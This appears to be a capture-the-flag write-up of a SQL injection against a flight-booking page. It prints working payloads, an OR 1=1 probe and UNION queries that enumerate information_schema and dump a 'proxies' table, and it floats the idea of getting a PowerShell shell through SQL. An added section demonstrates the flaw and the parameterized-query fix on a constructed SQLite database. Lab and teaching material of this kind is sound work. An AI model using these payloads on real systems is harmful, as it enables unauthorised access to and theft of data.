✈️Ascension

We first discover a web page on port 80:

We discover some possible users:

- Nikolai Belinski
- Tank Dempsey
- Edward Richtofen
- Takeo Masaki
- Fanny Spencer

On the "book flight" page we quickly discover the following input that seems vulnerable to SQLi:

We are able to trigger the following error with a simple 'OR 1=1-- -

So maybe we can retrieve some information this way. We follow the SQLi path and try a UNION query:

' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -

With the following payloads, we are able to retrieve the table names and then the column names of the proxies table:

' UNION SELECT NULL,table_name,NULL,NULL,NULL FROM information_schema.tables--
' UNION SELECT NULL,column_name,NULL,NULL,NULL FROM information_schema.columns WHERE table_name='proxies'--

Having found the column names for proxies, we query the table itself:

' UNION SELECT proxy_id,proxy_name,subsystem_name,NULL,NULL FROM proxies--

So could this mean that a user called svc_dev can run a cmd and PowerShell? From this information, we could imagine that we need to obtain a shell by executing a PowerShell script via an SQL request?
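
Why the UNION payloads above are accepted, and what closes the hole, shown as an added example that is not part of the original write-up or the target's code. The backend is assumed to build its query by string concatenation; the in-memory SQLite database, its schema and its rows are constructed stand-ins, and only the two payload strings come from the page.

```python
import sqlite3

# Payloads exactly as they appear on the page.
PROBE = "' UNION SELECT NULL,NULL,NULL,NULL,NULL-- -"
DUMP = "' UNION SELECT proxy_id,proxy_name,subsystem_name,NULL,NULL FROM proxies--"

def make_db():
    # Constructed stand-in database: schema, rows and names are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE flights (id INTEGER, origin TEXT, "
               "destination TEXT, depart TEXT, price REAL)")
    db.execute("INSERT INTO flights VALUES (1, 'LHR', 'JFK', '2024-05-01', 420.0)")
    db.execute("CREATE TABLE proxies (proxy_id INTEGER, proxy_name TEXT, "
               "subsystem_name TEXT)")
    db.execute("INSERT INTO proxies VALUES "
               "(1, 'constructed_proxy', 'constructed_subsystem')")
    return db

def search_vulnerable(db, destination):
    # Weak form: the input is spliced into the SQL text, so a quote in the
    # input closes the string literal and the remainder is parsed as SQL.
    sql = ("SELECT id, origin, destination, depart, price FROM flights "
           "WHERE destination = '" + destination + "'")
    return db.execute(sql).fetchall()

def search_parameterized(db, destination):
    # Hardened form: the value is bound as data and is never parsed as SQL,
    # so the payload is only compared against the destination column.
    sql = ("SELECT id, origin, destination, depart, price FROM flights "
           "WHERE destination = ?")
    return db.execute(sql, (destination,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for label, value in [("normal", "JFK"), ("probe", PROBE), ("dump", DUMP)]:
        print(label, "vulnerable:   ", search_vulnerable(db, value))
        print(label, "parameterized:", search_parameterized(db, value))
```

With the concatenated query, the five-NULL probe returns an extra all-NULL row and the second payload returns the contents of an unrelated table; with the bound parameter both inputs match no flight and return nothing.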
